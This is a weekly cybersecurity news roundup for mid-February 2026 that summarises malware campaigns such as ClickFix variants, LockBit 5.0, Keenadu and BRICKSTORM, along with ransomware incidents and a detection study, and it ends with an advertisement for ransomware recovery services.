News Week: February 16th to February 22nd, 2026

Advanced macOS ClickFix Variant Introduces Multi-Layered Stealer Techniques

The evolving ClickFix campaign now targets macOS systems with a refined variant known as Matryoshka, leveraging layered obfuscation and in-memory execution to evade detection. Victims are redirected via typosquatting domains into fake support pages, where they are tricked into running malicious Terminal commands. This user-driven action bypasses native macOS safeguards, enabling the execution of a concealed loader that retrieves additional payloads. The infection chain unpacks entirely in memory using encoded and compressed scripts, avoiding traditional file-based detection. Once active, the malware deploys an AppleScript stealer designed to extract browser credentials and cryptocurrency wallet data. It also integrates anti-analysis techniques such as API-gated communication and suppressed output to remain stealthy. In some cases, it manipulates applications like Ledger Live or initiates phishing prompts to harvest passwords, highlighting the growing sophistication of social engineering-driven macOS threats.

Cross-Platform Ransomware Expands Enterprise Attack Surface

LockBit 5.0 marks a major step forward in ransomware development, introducing a unified framework that targets Windows, Linux, and ESXi systems. While the core encryption and double-extortion logic remain consistent, the Windows variant includes advanced evasion techniques such as process hollowing, ETW manipulation, and log clearing to evade detection. Meanwhile, Linux and ESXi versions are optimized for server environments, enabling fast encryption and disruption of virtual infrastructure. The ESXi build is particularly impactful, as it can shut down virtual machines to access and encrypt their data at scale. Using modern cryptographic methods and features like partial encryption and free-space wiping, the threat is clearly designed for large enterprise environments, highlighting the need for comprehensive security across endpoints, servers, and virtualization layers.

ClickFix Variant Leverages DNS Lookups for Stealthy Malware Delivery

Microsoft has identified a new evolution of the ClickFix technique, where attackers abuse DNS queries to deliver malware while evading traditional detection mechanisms. Victims are lured through fake error messages that instruct them to execute commands, unknowingly granting elevated access. In this variant, the initial command performs a DNS lookup against an attacker-controlled server instead of the system’s default resolver. The response is then parsed and executed as a second-stage payload, allowing malicious activity to blend into normal network traffic. This staged approach ultimately delivers ModeloRAT, a remote access trojan capable of system reconnaissance, data collection, and further payload execution. By leveraging trusted system tools and DNS traffic, the campaign highlights how attackers continue refining social engineering techniques to bypass defenses, particularly in corporate environments where such activity may appear legitimate.

Firmware-Level Android Backdoor Enables Persistent Full-Device Compromise

A newly identified Android threat known as Keenadu demonstrates how deeply embedded malware can achieve near-total control over infected devices. Unlike typical mobile threats, this backdoor can reside within firmware, allowing it to operate across all installed applications and bypass standard security controls. It spreads through multiple vectors, including compromised OTA updates, system apps, unofficial APKs, and even previously available apps on official app stores. The most advanced variant integrates into core system components, enabling extensive data access such as messages, credentials, and browsing activity—even in private sessions. Additionally, it can silently install applications and assign permissions without user awareness. Due to its deep system integration, removal is extremely difficult using conventional methods, making firmware replacement or device substitution the only reliable mitigation. This highlights the growing risks associated with supply chain compromises in the Android ecosystem.

Ransomware Incident Disrupts Operations at Major Japanese Hotel Chain

A recent cyberattack targeting Washington Hotel underscores the continued vulnerability of the hospitality sector to ransomware incidents. Detected on February 13, 2026, the intrusion involved unauthorized access to multiple internal servers, prompting the company to immediately disconnect external network connections and initiate containment procedures. An internal response team was assembled, and authorities alongside cybersecurity specialists were engaged to investigate the breach and evaluate potential data exposure. While certain business-critical systems were impacted, the extent of any data exfiltration remains unclear. Notably, customer data linked to the hotel’s membership program appears unaffected, as it is hosted on separate infrastructure. Some locations experienced minor disruptions to payment systems, though overall operations continued. The incident highlights how rapid isolation and coordinated response efforts are essential in limiting damage from ransomware attacks.

Ransomware Landscape Expands with Record Victims and Emerging Threat Groups

The global ransomware ecosystem reached new highs in 2025, with a significant surge in both victims and active threat groups. Researchers tracked over 7,400 organizations listed on extortion sites, marking a 30% increase compared to the previous year. At the same time, the number of identified ransomware groups climbed to 124, including dozens of newly emerging actors. This rapid expansion is partly driven by the growing accessibility of AI tools, which enable less experienced attackers to conduct phishing campaigns, analyze stolen data, and even assist in negotiations. Despite the rise in incidents, overall ransom payments have declined as more organizations resist extortion demands. However, the threat landscape is becoming increasingly fragmented, with smaller and more agile groups replacing large syndicates. Combined with common entry points such as phishing, credential abuse, and RDP exposure, ransomware remains a persistent and evolving risk for organizations worldwide.

Fake CAPTCHA Campaigns Enable Rapid Enterprise-Wide Compromise

A recent ClickFix-style attack demonstrates how a single user interaction with a fake CAPTCHA page can escalate into a full-scale enterprise breach. Victims are tricked into executing malicious commands via the Run dialog, initiating a multi-stage infection chain that deploys Latrodectus and Supper. The initial payload leverages PowerShell to download additional components, while DLL side-loading techniques ensure stealthy execution. Latrodectus focuses on reconnaissance, collecting system, network, and domain information to map the environment, whereas Supper establishes persistence and enables command-and-control communication. Together, they allow attackers to move laterally, execute further payloads, and potentially prepare ransomware deployment. The attack highlights how trusted user interactions can be weaponized, reinforcing the need for monitoring suspicious command execution, restricting script-based downloads, and strengthening user awareness against deceptive verification prompts.

Research Highlights AI-Driven Approach for Detecting Android Ransomware via Network Traffic

A recent academic study explores a proactive approach to identifying Android ransomware by analyzing network traffic patterns through an ensemble machine learning framework. Rather than relying on static detection methods, the research emphasizes adaptive models capable of responding to evolving threat behavior, addressing challenges such as concept drift and obfuscation techniques. The proposed system combines multiple classifiers, including LightGBM, XGBoost, and Random Forest, to improve detection accuracy and resilience. Additionally, explainable AI techniques are incorporated to enhance transparency and support analyst decision-making. A key focus of the study is continuous learning, enabling models to update dynamically as new data emerges without requiring full retraining. Experimental results indicate strong performance, particularly from LightGBM, suggesting that such adaptive, data-driven approaches could significantly improve real-time ransomware detection in mobile environments.

Updated Analysis Reveals More Evasive Variant of Advanced Backdoor Malware

Recent updates from cybersecurity authorities highlight an evolved version of BRICKSTORM, introducing enhanced evasion through .NET Native Ahead-of-Time (AOT) compilation. This modification allows the malware to operate as a standalone binary, improving portability while making detection more challenging. Although it retains its core functionality—such as encrypted command-and-control communication—it differs from earlier versions by omitting built-in persistence mechanisms, instead relying on alternative execution strategies. The malware has been linked to long-term espionage campaigns targeting virtualized environments, particularly VMware vSphere infrastructures. Once inside a network, attackers can access sensitive systems, extract credentials from virtual machine snapshots, and establish hidden virtual machines for ongoing operations. The updated analysis also provides new detection signatures, reinforcing the need for organizations to enhance monitoring, segmentation, and hardening of critical infrastructure against increasingly stealthy backdoor threats.

Firewall Exploitation Emerges as Leading Entry Point for Ransomware Attacks

A recent threat intelligence report highlights that compromised firewalls played a role in the vast majority of ransomware incidents in 2025, underscoring their critical position in modern attack chains. Analysis of large-scale telemetry data shows that attackers frequently exploit outdated vulnerabilities or leverage stolen credentials to gain initial access through these perimeter devices. Notably, many of the weaknesses targeted are long-known issues, indicating that unpatched systems and legacy infrastructure remain a major risk. The findings also align with broader research pointing to network edge devices as common entry points for attackers. In several cases, compromised firewall appliances were linked to widespread campaigns involving groups such as Akira, affecting numerous organizations. The report reinforces the importance of timely patching, strong authentication controls, and continuous monitoring of edge infrastructure to reduce exposure to ransomware threats.

Semiconductor Firm Investigates Potential Ransomware Incident Following Network Intrusion

Advantest has disclosed a cybersecurity incident involving suspicious activity within its internal IT environment, raising concerns about possible ransomware deployment. The issue was first identified on February 15, prompting the company to swiftly initiate containment measures, including isolating impacted systems and engaging external cybersecurity specialists. Early findings indicate that an unauthorized actor may have gained access to parts of the network, though the exact entry point and full extent of the breach are still under investigation. The organization is currently assessing whether sensitive data, including customer or employee information, may have been affected. While operations continue, the incident highlights the importance of rapid detection and response in limiting potential damage. Further updates are expected as the investigation progresses and additional details become available.

Conclusion

In conclusion, the current threat landscape highlights the growing sophistication and diversity of cyberattacks, ranging from advanced ransomware operations and supply chain compromises to stealthy backdoors and social engineering campaigns. Attackers continue to exploit human behavior, legacy systems, and misconfigured infrastructure, making proactive security measures and rapid incident response more critical than ever.

As experts in ransomware recovery and cybersecurity, we provide specialized support through our ransomware decryption service, Ransomware Negotiation Services, and a proactive Incident Response Retainer. If your organization needs assistance recovering from an attack or strengthening its defenses, get in touch with our team today.